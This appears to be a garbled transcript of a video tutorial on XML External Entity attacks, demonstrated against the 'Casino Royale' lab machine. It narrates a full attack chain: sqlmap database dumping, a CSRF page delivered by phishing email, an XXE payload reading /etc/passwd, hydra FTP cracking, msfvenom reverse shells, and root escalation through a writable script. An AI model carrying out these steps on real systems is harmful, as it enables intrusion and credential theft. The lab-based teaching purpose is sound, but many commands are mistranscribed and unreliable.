So guys, now we are going to discussing about XML External Entity. So XML External Entity injection is a common and critical vulnerability in bug bounty programs. It occurs when an application passes as XML input and does not properly disable and processing for external entities, allowing an attacker to read a sensitive files and perform server-side request forgery and sometimes even execute the remote code execution. So, what is XSE? An XML external entity vulnerability arises when an application passes the XML input. So, an attacker can inject their own XML with the malicious entities. Now, we would like to look here. First of all, we would like to try to explore all these things and we would like to exploit this XML. So, we would like to come back to your Linux machine. So, I have hosted for this a machine. So, I have hosted this here. Now, we would like to look here, this one, and this. So, where we have got here as a nmap result. One is available with FTP, another one is available with SMTPD, and port 8 is with Apache server, and port 8081 it's with PHP CLI server. We would like to walk to this target IP address. So let's come back here. We would like to try to open here. We would like to go here as a bug bounty. Now just type go with the directory buster, then let's just paste. Now in this directory buster, where we can see here as a index.php. Let me just open the file where you can look here created with Poker Max poker luggage software. Okay, so where we would like to try to get here as a poker. Now just type here as cat. Oh, sorry. Let me just type here as a such exploit as a poker. Oh, sorry, poker. Where you just need to get this targeted exploit like insecure cookie handling. So in XSE, that will also handle in insecure cookie handle. Now just copy, come back here, you just type it as a cat, then let's just paste here. Where you just need to look here, instructions. Okay, this is only the instruction. Okay, where insecure cookie handling vulnerabilities, where you can get entire of the zip file, so where you can practice entirely. So find out the site is running the script. So go to the site.com poker luggage poker admin with config.php. Then I would like to go for as index.php. We would like to go back here. Let me just go back here. Poker admin index.php, where you can look here poker max luggage with admin login. So where we have got all these things. Okay, now we just copy this one. Now we would like to try to do the SQL injection. Let me just type here as clear. You just type here as SQL map minus minus. So I just put here as minus u, then let's just paste here. Then in this case, I would like to utilize here as a forms. There I utilize a risk equal to risk 3 level 5 minus minus dbs patch. We would like to look here. So I have got entirely. So this a poker luggage. So I would like to try to dump all the information. So let me just type here as clear. Now here before I have done this one, so it's take a lot of vulnerabilities is there in the this XML entity. So I have corrected that one. It take more lengthy time. So I would like to try here as a dump all. So where it was dumping all and you have got all the information. Once you have look here, the username is admin. Once how you would like to identify username is admin in the exploit of such exploit, just write here as cat. Let me just put here as a list. Where is this? 6766. So just copy, just type cat in this only. You can get here. Username is admin is default. Okay, where he was written here. Now let's come back here. You just put here as a admin. Then let's come back. Password is here where you have cracked this password. So it will take a more lengthy time process. What else you have accepted? Okay, then you just try here as login. Then you are login as an admin area. You just try here as click login. Then you can click on manage players. You can look here Valnika. You just try here as click on edit info. There is a project manager of various clients, a project manager on VIP clients with portfolios, URI with the blog. You are in Casino Royale local, update your host file. Okay, now just come back here. You just type here as nano, etc as hostess. So I have updated here as casino.royale.local. Just copy, just type control X. Now just come back. Now let's just put here as HTTP casino royale.local. Let's go back here. This is where you just got it here. Now just paste here where you have got it here. Now you can look here. If you have been referred, you are looking as interest in our assistance, please send us email. Send an email to our CMS admin Valenica at the Cisco casino.royale.local. Make sure your reference known to a customer at least someone know as subject line. Otherwise, the email will be deleted automatically. We would like to try to send. Here we can also look here Snowfox CMS. It's quite interesting. Now let's come back here. In this case, let me just type here as clear. You just type here as such deployed Snowfox. That's it. Where you have got here cross-site request forgery. Now just type here as cat 35301.html. So where I have changed entirely here the portfolios and everything, like URL admin. And I have also changed here bro@local is verified. It is verified and password is password123. So you just need to change your own way. Okay, then password is 123. So I have activated my Apache server also. I can show you here 192.168.18.122. It was inactive. Now let me just type it as clear. Now let me just type it as I would like to try to activate now this one. Just type it as sudo system cd start Apache 2. Enter your password. That is done. Now if you try here, it will not get. Just try here with 122 where I have got it here. This is quite interesting. In previous lab we have done the cross-site request forgery. Now once you have done this one, now we have a port for a SMTP. So let's come back here. Let me just type it as clear. You just type a telnet. In the telnet, just oh sorry to forget to tell you, I just make a copy here. Unless I just make here as copy here as a alex.html. This is the file. I just put in my main running in the targeted website. I can show you here. I just put here as a alex.html where I have here. So I don't want to get this one as any type of mistake. I can show you here ls-l where www.html. I have put here that same thing. Okay, now quite interesting. Now let's move here as a telnet. Now let's come back Where is this? Go to here. Let me just come back. Just put it as cat etc hostess. Now I would like to just copy this one, come back. That's it. Now you just utilize here as a 25. Now you just need to send them mail. Okay, mail from as let me just utilize here as a bro. Okay, now then recipient to we would like to try to send whom we would like to try to send here is Valenica. Just copy. So we just need to send this lady woman. Let's come back. Where we have sent to her. Now let's just put here as a data. That's great. Subject Urbano. Now we just type here as hi. Let's just enter your targeted IP address of your kernel Linux IP address. Then you just put here as a alex.html. That's it. Now you just type here as y and you just put everything is okay. It was cute. Now once you would like to go here as a tail minus n1 minus f, just put here as where lock Apache 2 access.log, where which was done here as they have got this access. Now just quit this. So now I would like to try to in this my account. Then in this I would like to go for a signing. Now you just try here as group dot local. Now you just put here as your password 123, where you have logged in now successfully. Now once you have logged in here successfully, now just look here as in the admin, where in this admin, oh, this is users manage accounts. So now you can look here leave a caching, where we have got here as Elias Cashino. We would like to try to edit here. Now I primarily deal with the number along with our most elite customers with ultra access main.php. So just copy this one, come back here. We just put here as stp Cashino Royale, then ultra access main.php, where you can look here a client access with ultra. Quite interesting way. Okay, now we would like to try here. Now we would like to open the website. We would like to intercept the data here, and now we would like to try to here write as a XML payload. We would like to look the pesos, where you can look here as XML payload. We would like to try here as next. Now try using a curl or post with XML commands or XML script. Then PHP code is below. So this is disabled. Credentials with a simple users with credentials, X with a password, echo is welcome. Now let's go to here as credentials. Now let's go to here as a proxy settings. Let's just put this, come back. You just I would like to change because I have installed many things for doing the bug bounty programs. So now we would like to intercept this up, come back to here. We would like to try with the website. Okay, then let's try to refresh, where you have got this entirely send to a repeater. In the repeater tab, where you have got this, so you just change the request method to a post. Now once you get post method, now just type here as get xml.txt, where I have written here as a XML. Let me I just type here as clear cat XML. So I just need to utilize only this exploit, a simple exploit where I need to get a file from etc as password. That's it. Where I am writing here. So you can write your own payloads. What else you write you like. In this place, a file you can put as Apache logs. Otherwise, you can get like wget, and you can get a PHP reversal, and you can exploit automatically here. So we don't require anything else apart from this. So let me just come back here. I just paste this as a XML. So before let me I can without this I would like to cut this first, then try to send. So it's 200. Okay, you can see the welcome button here. So that's quite good. Now let's try to send. Now I can look here with the welcome along with the root access. So where we are getting the results here. So this is how you can do the XML exploit and get the bounty here. So where we have got it here. Now in this case you want to try to get here a curl minus d. You just put for as minus xml.txt. So in the utilizing as curl. Now entirely just copy from here, just copy the URL. That's it. Where you have got it here. So where we have identified only one username, just copy as there FTP user ultra. Now we would like to write here as clear. Now you just utilize here as hydra minus L. Then we would like to go for tracking as a user share word list. Then utilize here as a rockq.txt. Then I would like to enter my targeted IP address 167 as a FTP. That's it. Now let it go for cracking for the FTP. Then later we would like to try to look inside. So while when when you trying an XML exploit, there is like a file disclosure. Otherwise, you can utilize internal servers of anything. What else you require? Even you can do as a DOS attack with using of this one, utilizing this one. So you can do like as in this case. So let it crack this FTP. We would like to do the privilege of this machine. So we can do in this case. We would like to look here as we can do as a file uploads, and number 2 here is SOAP authentication. That I can also show, and SAML authentications. Oh, sorry, SOAP APIs here, authentications. And number 4 is REST APIs accepting XML. Now you can also utilize number 5 as a SVG payloads, files or documents or anything XLS, otherwise PDF, otherwise PPTs, or any type of XMLs where they can store. That's it. Now we would like to, in this case, it was over. Let it crack this one first. Before that cracking, now I would like to go for here as, let me just type here as clear. I just put here as MSF payload for a PHP. Then I would like to put for here as a meter preta, then reverse underscore TCP. I would like to put for as AL host equal to enter our target type address 192.168.18.122, and I just put for L port equal to 443 and file equal to as a raw. Then I need to get this one here as shell.php.file. Let we would like to, if FTP is cracked, then I would like to put this one in the shell.php.file. Try to upload in the FTP, then try to access this one. So while we are getting as more critical, like in bug bounty, in this case, while we can get how much critical way, you can get that much more bounty. So in this case, so where we just try here as cat shell.php.file, where this is a PHP file. Why I would like to mention a file, because of I don't want to get any type of errors. Okay. Now let me just go here as a MSF console. Let it launch this. It may take more lengthy time process also to crack this password. So where we have seen here, this is only the XML exploit where we can utilize and get all the information. Even you can look here in the printing where we have got all the information. That's it here. Let's we would like to look here. So this Metasploit loading in the newer version, it will take more lengthy time process also. Now let's we just utilize here, just put here as use exploit multi handler. Then just type here as set a payload. So what is your payload? This is your payload, php meter beta reverse core underscore tcp. Just copy, paste it. That's it here. Then you just type here as set lhost equal to 192.168.18.122, set lport equal to 443. That's it. So our task is pending. Our task is to get this password. So there we have set up all these things to get to the root access. So we would like to wait here. How much time we can it will take to get this one. So I don't like to waste much time. So let me just copy this one. Let me just type here as FTP enter your target IP address 192.168.18.167. So we can look here, customer access level is ultra, username is FTP user ultra. So let it that one crack. How much time it will take? Let it be. I know the password, then I can enter. So I can provide you the password later. I just enter as a bank, where I have login here. You just type list minus a, where you can look here, everything we have got it here. Hello world with pair. Battle to root.html, where I have got all these things. Now I would like to put our target here is output shell.php file. That's it, where I have successfully put this one, and transfer is completed. Now I would like to give this for a permission chmod 777 shell.php file, where site chmod command is okay, 200 site command is okay. Now let me we just come back here. So this it may take a more lengthy time process. We have set the L port, then I try to exploit this one. Let's see what I can get from here. Started reverse TCP. We would like to look this. So in this case, we would like to go back. So here, let's see, this is still cracking, where we have put in this. So where let me just come back here. Now let me, I would like to make this off. Now let's come back here. I would like to make it as disable this one. Now let me, we can see here all these things. Here is main.php, quite interesting, where I have set up a listener. Now let me, I would like to delete this a main.php. That's it, where you can look here a shell.php, where you just try here, where you have got the meter session automatically. It's quite interesting way. You just need to research more to get this a reversal. Now you just type here as shell, you have got it here. You just type id, you have got it here. You just type here as a which python, you have got it here. You just type here as python -c, import pdy span pin bash, where we have got it here. You just put here as a export term equal to extra. That's great. Now just type here as clear. We have seen here as a ultra access view. Now just type here as ls minus air. Now we would like to look what we would like to look here. We didn't get anything else from here. You just type here as okay. Let me. I just go to here as cd where www html. Let's just try here as ls minus air. Now where you can look here main.txt. Now where here we would like to look here as a www.data. So I would like to concentrate on www.data 4096. So you just go to here as a includes. Let me just type here as clear. You just type plus minus f. Now just type here as cat a config.php. Just copy and let's just paste it. Where you can look here, admin table is poker admin, player table is poker player, and username is Valinika, and her database password and database. Where we have successfully got this useful information. Now let me. I would like to look here. So it's take a lengthy time process also. Let's just copy. Just type here as cd home plus minus l. Only Valenica, okay, and v. So su Valenica. Now password is this one. 11 achieves 11 exclamatory mark. Where we have came to Valenica. Now just type plus minus l cd Valenica. Now just type plus minus l. There is nothing else a useful information. cd a mail directory. Now just type plus minus l. So we don't want to look this cd home directory. Now just type plus minus l. Let me just type it as clear. cd as plus minus l. This is also no useful. Let's go to here as ftp user ultra. Just copy and paste. So where we have in this also nothing else. We would like to try to find a root access for us. Now I would like to put let me just type it as clear. Just type it as f5 minus vrm as 4000. 2 is greater than dev or null. That's it. We would like to try to find it. So this we would like to try to check the first one. A cache in Royale MI6 detect as a test. Okay, I would like to first just try here as plus minus f. So this is a file to execute it. We would like to go to here cd. We would like to Royale. Now just type plus minus f. Yes, here I have something. Just type plus minus here. Now so we would like to write here as cat a run.sh. Oh, sorry. Cat a run.sh. Permission is denied. Okay, quite interesting here. Now simply we would like to go to here as a temp directory. Now in the temp directory, now we would like to open this a new tab. In this case I would like to try here as exit. Okay, let me just type here as clear. Now let's we just type here as msf vena payload for cmd. You just put for a unix, just put for as a reverse underscore. I would like to put for a here as initcat lhost equal to enter your target IP address 192.168.18.122 l port equal to 1234. Then just put for R. We would like to look here what we can get. So you just need to take entirely this one. Just copy, just put here as a nano run.sh. Now let's just paste it. Just type Ctrl O, Ctrl X. That's it. Now just type here as python -f http dot server. Now let's go back here. You just put here as wget http. Enter our target IP address 192.168.18.122 and it's with 8000 run.sh. That's it. Where you have got this a run.sh. Now we would like to go to so I would like to go to here as PRM. So they are now cd as a op. Let me just type here as cache no royale. Just go to here cache no royale plus minus f. So I just try to run this as minus PRM is 4000. Let's 2 is greater than dev or null. So where I would like to try to run this one. Let me just go back here and come back, open a new tab. So what is this port? Here is 1234 netcat minus lvnp 1234. That's it here. Now let's come back. Where is this? Here. Just I just copy. Now go to here as a temp directory. Now let me just try this. Now we can see here. So I have here get a connected directly here. That's it. Now you just type here as id. I have got here as Vilnica to root. You just type here as cd as root list minus f in the root folder. where here is a flag. So let me, I just type here as a which Python. We have got here as which Python minus C. Import pdy span bin bash, where we can got a successful in this one, where we come to here as a root. Now just type, I would like to put here as a export tab equal to extra. Let me just type here as clear city as a flag type list minus f. You just type here as cat. What we would like to look here, flag.sh, where congratulations to run this script as a flag, cd to run as a flag with the localhost casino Royale local with 8082. So this is running under 80882 at the final thing. So where we have exploited everything in an XML exploit, where we would like to get at everything. We would like to look here in the render. Exactly. That's it. So this is how you can perform this one as a XML external entity. Now later we would like to discuss about rate limiting attack. That's it here.